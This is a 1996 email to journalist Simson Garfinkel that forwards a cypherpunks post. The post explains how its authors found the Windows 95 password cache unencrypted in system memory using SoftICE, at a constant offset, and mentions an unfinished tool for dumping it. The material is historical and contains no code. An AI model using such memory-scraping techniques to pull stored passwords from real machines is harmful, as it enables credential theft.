From: Rich Graves[SMTP:llurch@networking.stanford.edu] Sent: Tuesday, January 16, 1996 2:00 PM To: Simson L. Garfinkel Subject: Re: MS story Peter explained a bit about what he *could have* done when he provided the source code, and Frank Andrew Stevenson also had some ideas. The people below are working on an independent hack that will pop up stored passwords for Windows 95, again whether you have the 128-bit RC4 patch applied, and have turned off persistent password caching to disk, or not. Brian Gorka described the exploit they're working on (but have not finished, no) on in a message to cypherpunks: A friend and I discovered this 'feature' accidentally. (now that I checked c2's Hack MSoft page I see someone else exploited it in WFW) Using heapwalker on WFW, we noticed the password cache was not encrypted. I wanted an official C2 I hacked Micro$oft Tee-Shirt and we wondered if this was still true after the Windows 95 password cache 'fix'. We fired up h eapwalker and found nothing. It won't let you look in that area. BUT, After firing up SoftICE for Windows 95, we found the area in less than 5 minutes. It is in the C000 0000 memory area (the system area), and the password information is ALWAYS a constant offset from some text. (IFSMGR I think) Dumping it out is pretty easy, and as soon as we get some free time, the rest of the code will flow, we have something in the way of output, but it's not pretty.